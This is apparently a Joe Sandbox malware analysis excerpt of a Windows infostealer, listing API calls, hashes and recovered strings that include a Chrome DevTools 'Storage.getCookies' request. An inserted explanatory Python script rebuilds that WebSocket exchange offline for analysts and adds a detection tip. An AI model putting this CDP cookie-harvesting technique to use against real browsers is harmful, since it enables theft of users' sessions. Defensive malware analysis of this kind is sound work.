                          • lstrcpy.KERNEL32(00000000,?), ref: 007115BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007115E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00711796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007117BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007117F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0071181C
                          • FindClose.KERNEL32(00000000), ref: 0071182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 5b6b1293fd09cee0ff3ced0ed72b8cbb1863fc0989a7be3761715cfe3f385f0d
                          • Instruction ID: c07b3486f4a7447a06f2700e5b0403e2056c7f418489367d1c8038a1ababbd36
                          • Opcode Fuzzy Hash: 5b6b1293fd09cee0ff3ced0ed72b8cbb1863fc0989a7be3761715cfe3f385f0d
                          • Instruction Fuzzy Hash: 20C16171A25606DBCB21EF78DC8DAEE77F8AF44700F444528F945A7292DB38DC458B90
                          APIs
                          • wsprintfA.USER32 ref: 0071E22C
                          • FindFirstFileA.KERNEL32(?,?), ref: 0071E243
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071E263
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 0071E27D
                          • wsprintfA.USER32 ref: 0071E2A2
                          • StrCmpCA.SHLWAPI(?,0072CFEC), ref: 0071E2B4
                          • wsprintfA.USER32 ref: 0071E2D1
                            • Part of subcall function 0071EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0071EE12
                          • wsprintfA.USER32 ref: 0071E2F0
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0071E304
                          • lstrcat.KERNEL32(?,010DE468), ref: 0071E335
                          • lstrcat.KERNEL32(?,00731794), ref: 0071E347
                          • lstrcat.KERNEL32(?,?), ref: 0071E358
                          • lstrcat.KERNEL32(?,00731794), ref: 0071E36A
                          • lstrcat.KERNEL32(?,?), ref: 0071E37E
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0071E394
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E3D2
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E422
                          • DeleteFileA.KERNEL32(?), ref: 0071E45C
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701557
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701579
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 0070159B
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 007015FF
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0071E49B
                          • FindClose.KERNEL32(00000000), ref: 0071E4AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                          • String ID: %s\%s$%s\*
                          • API String ID: 1375681507-2848263008
                          • Opcode ID: a5057025038360e505da200705ce7119eccf7ea471d6700753d408e0944a37dc
                          • Instruction ID: 79fdcbaf1f777d0f928b9823b54109d766a40a910979138fd6125e8d1e78925e
                          • Opcode Fuzzy Hash: a5057025038360e505da200705ce7119eccf7ea471d6700753d408e0944a37dc
                          • Instruction Fuzzy Hash: C98195B2914218DBCB24EF74DC49AEF77B9BF44300F044598B90AA7191DF78AA49CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007016E2
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00701719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070176C
                          • lstrcat.KERNEL32(00000000), ref: 00701776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007017A2
                          • lstrcpy.KERNEL32(00000000,?), ref: 007018F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007018FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat
                          • String ID: \*.*
                          • API String ID: 2276651480-1173974218
                          • Opcode ID: 34715bc8e7ae4abb3894a8d71993ce931e75e5664c9e2086c4a0ca614ccd6193
                          • Instruction ID: 914c77e45445281f91d108724c645f99be741777500d796e060641c410abc4c1
                          • Opcode Fuzzy Hash: 34715bc8e7ae4abb3894a8d71993ce931e75e5664c9e2086c4a0ca614ccd6193
                          • Instruction Fuzzy Hash: 98816772924255DBCB21EF68D98DAAE77F5AF14300F444214F805B72D2CB38ED05CB91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0071DD45
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0071DD4C
                          • wsprintfA.USER32 ref: 0071DD62
                          • FindFirstFileA.KERNEL32(?,?), ref: 0071DD79
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071DD9C
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 0071DDB6
                          • wsprintfA.USER32 ref: 0071DDD4
                          • DeleteFileA.KERNEL32(?), ref: 0071DE20
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0071DDED
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701557
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701579
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 0070159B
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 007015FF
                            • Part of subcall function 0071D980: memset.MSVCRT ref: 0071D9A1
                            • Part of subcall function 0071D980: memset.MSVCRT ref: 0071D9B3
                            • Part of subcall function 0071D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0071D9DB
                            • Part of subcall function 0071D980: lstrcpy.KERNEL32(00000000,?), ref: 0071DA0E
                            • Part of subcall function 0071D980: lstrcat.KERNEL32(?,00000000), ref: 0071DA1C
                            • Part of subcall function 0071D980: lstrcat.KERNEL32(?,010DD930), ref: 0071DA36
                            • Part of subcall function 0071D980: lstrcat.KERNEL32(?,?), ref: 0071DA4A
                            • Part of subcall function 0071D980: lstrcat.KERNEL32(?,010DCCB0), ref: 0071DA5E
                            • Part of subcall function 0071D980: lstrcpy.KERNEL32(00000000,?), ref: 0071DA8E
                            • Part of subcall function 0071D980: GetFileAttributesA.KERNEL32(00000000), ref: 0071DA95
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0071DE2E
                          • FindClose.KERNEL32(00000000), ref: 0071DE3D
                          • lstrcat.KERNEL32(?,010DE468), ref: 0071DE66
                          • lstrcat.KERNEL32(?,010DD208), ref: 0071DE7A
                          • lstrlen.KERNEL32(?), ref: 0071DE84
                          • lstrlen.KERNEL32(?), ref: 0071DE92
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071DED2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                          • String ID: %s\%s$%s\*
                          • API String ID: 4184593125-2848263008
                          • Opcode ID: b5b26fc30000b60bfb1ee2ddb4b7285a763e8cdff2274c3ba5e3bbaa2b3fb283
                          • Instruction ID: a61142ad873b7234849379c18a63d952f9cad32fafb72dc4771de18cff77e473
                          • Opcode Fuzzy Hash: b5b26fc30000b60bfb1ee2ddb4b7285a763e8cdff2274c3ba5e3bbaa2b3fb283
                          • Instruction Fuzzy Hash: EA614472A14208EBCB24EF78DC89ADE77B9BF48300F044594B945A7291DF38AE45DF90
                          APIs
                          • wsprintfA.USER32 ref: 0071D54D
                          • FindFirstFileA.KERNEL32(?,?), ref: 0071D564
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071D584
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 0071D59E
                          • lstrcat.KERNEL32(?,010DE468), ref: 0071D5E3
                          • lstrcat.KERNEL32(?,010DE4C8), ref: 0071D5F7
                          • lstrcat.KERNEL32(?,?), ref: 0071D60B
                          • lstrcat.KERNEL32(?,?), ref: 0071D61C
                          • lstrcat.KERNEL32(?,00731794), ref: 0071D62E
                          • lstrcat.KERNEL32(?,?), ref: 0071D642
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071D682
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071D6D2
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0071D737
                          • FindClose.KERNEL32(00000000), ref: 0071D746
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 50252434-4073750446
                          • Opcode ID: 4b52a8f8457dd993d0c80c0c888c5c0eba6622f6aaaa7f98249293121b68f321
                          • Instruction ID: f1a250b43bf1fa2a351b128761806e233a0b096488bd9d06454998d8d0bda60b
                          • Opcode Fuzzy Hash: 4b52a8f8457dd993d0c80c0c888c5c0eba6622f6aaaa7f98249293121b68f321
                          • Instruction Fuzzy Hash: 536156B5910219DBCB24EF78DC89ADE77B5EF48300F008595F549A7291DB38AE45CF90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !T{$/k}$/p=;$?Uj1$OqV$XHS^$`&s1$hpy$r%3$v%3$u{$}}
                          • API String ID: 0-1495936055
                          • Opcode ID: b45f0a3169358b4adade9899843ae2dc0cfaced62ce5b9f08f2dcb281418beb5
                          • Instruction ID: cb5903cd587bf788b3f1925269d2c8c1bde446e56f87e58b56c9b1b9c642b0b5
                          • Opcode Fuzzy Hash: b45f0a3169358b4adade9899843ae2dc0cfaced62ce5b9f08f2dcb281418beb5
                          • Instruction Fuzzy Hash: A7B204F360C2049FD308AE2DEC9567AFBE9EF94720F1A492DE6C5C7744EA3158418693
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                          • API String ID: 909987262-758292691
                          • Opcode ID: ae22934d99532bf0312d4ef5a76b658e0b529d9a4fed94f0556a4203051be5d8
                          • Instruction ID: b8e7beb5808b33123c59f38f755ce0dc368b66f0ee50480993e12534fc6e0ea2
                          • Opcode Fuzzy Hash: ae22934d99532bf0312d4ef5a76b658e0b529d9a4fed94f0556a4203051be5d8
                          • Instruction Fuzzy Hash: 28A24871D01269DFDB20DFA8D8807EDBBB6BF48300F1481A9E558A7281DB795E85CF90
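                          The string fragments in this entry assemble into a hand-rolled WebSocket client for the Chrome DevTools Protocol (CDP): an HTTP/1.1 upgrade request to ws://host:port carrying Connection: Upgrade, Upgrade: websocket, Sec-WebSocket-Key and Sec-WebSocket-Version: 13, followed by the JSON-RPC message {"id":1,"method":"Storage.getCookies"}, which makes a browser that exposes a DevTools endpoint hand back every cookie of its profile in clear text. The Python below is an added example written for this page, not code from the sample or from Joe Sandbox. It reconstructs both sides of that exchange offline so an analyst can see what the fragments produce on the wire: the upgrade request, the Sec-WebSocket-Accept the server must answer with, the masked client frame that carries the CDP request, and the decoding of a server reply. The request path (/devtools/browser/example), the port (9222), the key (the RFC 6455 worked-example value) and the reply contents are assumptions; the report shows none of them.

```python
import base64
import hashlib
import json
import struct
from typing import List, Tuple

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed handshake GUID from RFC 6455

# The JSON-RPC request recovered verbatim from the sample's strings.
GET_COOKIES = '{"id":1,"method":"Storage.getCookies"}'


def build_upgrade_request(host: str, port: int, path: str, key_b64: str) -> bytes:
    """Assemble the upgrade request from the header fragments seen in the sample.
    The request line is not visible in the report, so the path is an assumption."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "Connection: Upgrade\r\n"
        "Upgrade: websocket\r\n"
        f"Sec-WebSocket-Key: {key_b64}\r\n"
        "Sec-WebSocket-Version: 13\r\n\r\n"
    ).encode()


def expected_accept(key_b64: str) -> str:
    """Sec-WebSocket-Accept = base64(SHA-1(key || GUID)); this is what the peer must echo."""
    return base64.b64encode(hashlib.sha1((key_b64 + WS_GUID).encode()).digest()).decode()


def check_upgrade_response(raw: bytes, key_b64: str) -> bool:
    """True only for a 101 whose Sec-WebSocket-Accept matches our key."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")
    if not head[0].startswith("HTTP/1.1 101"):
        return False
    headers = {}
    for line in head[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers.get("sec-websocket-accept") == expected_accept(key_b64)


def _frame_header(n: int, masked: bool) -> bytes:
    """FIN + text opcode (0x81) and the 7/16/64-bit payload length encoding."""
    flag = 0x80 if masked else 0
    if n < 126:
        return bytes([0x81, flag | n])
    if n < 1 << 16:
        return bytes([0x81, flag | 126]) + struct.pack("!H", n)
    return bytes([0x81, flag | 127]) + struct.pack("!Q", n)


def encode_client_frame(payload: bytes, mask: bytes) -> bytes:
    """Client-to-server frames must carry a 4-byte mask (RFC 6455 section 5.3)."""
    return _frame_header(len(payload), True) + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(payload))


def encode_server_frame(payload: bytes) -> bytes:
    """Server-to-client frames are sent unmasked."""
    return _frame_header(len(payload), False) + payload


def decode_frame(frame: bytes) -> bytes:
    """Decode one text frame, masked or not, and return its payload."""
    if frame[0] & 0x0F != 0x1:
        raise ValueError("not a text frame")
    masked, n, pos = bool(frame[1] & 0x80), frame[1] & 0x7F, 2
    if n == 126:
        n, pos = struct.unpack("!H", frame[2:4])[0], 4
    elif n == 127:
        n, pos = struct.unpack("!Q", frame[2:10])[0], 10
    mask = frame[pos:pos + 4] if masked else b"\0\0\0\0"
    pos += 4 if masked else 0
    return bytes(b ^ mask[i % 4] for i, b in enumerate(frame[pos:pos + n]))


def cookies_from_reply(reply: bytes) -> List[Tuple[str, str]]:
    """Reduce a Storage.getCookies result to (domain, name) pairs; values are dropped on purpose."""
    msg = json.loads(reply)
    if msg.get("id") != 1:
        raise ValueError("reply does not answer request id 1")
    return [(c["domain"], c["name"]) for c in msg["result"]["cookies"]]


# Constructed reply (not captured from the sample) in the shape CDP returns for Storage.getCookies.
SAMPLE_REPLY = json.dumps({"id": 1, "result": {"cookies": [
    {"name": "session", "value": "REDACTED", "domain": ".example.com", "httpOnly": True},
    {"name": "csrftoken", "value": "REDACTED", "domain": "example.org", "httpOnly": False},
]}}).encode()


def demo() -> List[Tuple[str, str]]:
    key = "dGhlIHNhbXBsZSBub25jZQ=="  # RFC 6455 example key; a real client sends 16 random bytes
    request = build_upgrade_request("127.0.0.1", 9222, "/devtools/browser/example", key)
    assert b"Sec-WebSocket-Version: 13" in request
    ok = (b"HTTP/1.1 101 Switching Protocols\r\nUpgrade: websocket\r\nConnection: Upgrade\r\n"
          b"Sec-WebSocket-Accept: " + expected_accept(key).encode() + b"\r\n\r\n")
    assert check_upgrade_response(ok, key)
    frame = encode_client_frame(GET_COOKIES.encode(), b"\x37\xfa\x21\x3d")  # fixed mask for the demo
    assert decode_frame(frame) == GET_COOKIES.encode()
    return cookies_from_reply(decode_frame(encode_server_frame(SAMPLE_REPLY)))


if __name__ == "__main__":
    print(demo())
```

                          On the wire the whole theft is one short text frame in each direction, so a network sensor on the loopback interface sees little; the durable detection point is the cleartext upgrade request itself (Upgrade: websocket towards a local DevTools port) coming from a process that is not the browser.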
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007123D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007123F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00712402
                          • lstrlen.KERNEL32(\*.*), ref: 0071240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00712436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00712486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
